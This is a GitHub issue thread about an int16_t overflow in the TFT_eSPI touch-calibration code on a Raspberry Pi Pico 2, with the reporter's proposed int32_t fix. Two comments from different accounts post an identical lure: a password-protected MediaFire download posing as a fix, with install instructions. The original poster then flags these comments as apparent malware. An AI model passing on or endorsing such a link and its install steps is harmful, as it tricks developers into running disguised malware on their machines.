Bodmer/TFT_eSPI #3465: Overflow while calibrationg touch screen (and possible solution)

ullibak, 2024-08-28:
Hi

I ran into a problem when using the new Raspberry Pi Pico 2.

Setup:
Raspberry Pi Pico 2 
Waveshare Pico Res-Touch display with touch screen:
https://www.waveshare.com/product/raspberry-pi/boards-kits/raspberry-pi-pico-cat/pico-restouch-lcd-3.5.htm?___SID=U
Arduino IDE with TFT_eSPI library.

When using the Keypad_480x320 example, the touch screen seemed not to work. I found that the coordinate values were completely erroneous. Digging deeper into the issue I found that the new Pico 2 somehow gives much larger values for the touchscreen raw coordinates compared to the old Pico board. The values are large enough to cause an overflow in the calibration routine.

I hat to change line 229 of Extensions/Touch.cpp$ from

`int16_t values[] = {0,0,0,0,0,0,0,0};`

to

`int32_t values[] = {0,0,0,0,0,0,0,0};`

This fixed the problem but I am not sure if all the values that store raw coordinates should be changed to 32 bit variables. 
Thanks for checking this!

qiliq, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

NEKO-JOJUK, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

ullibak, 2024-08-28:
The tree posts above with a link to mediafire.com appear to be simple malware and not a solution for any problem...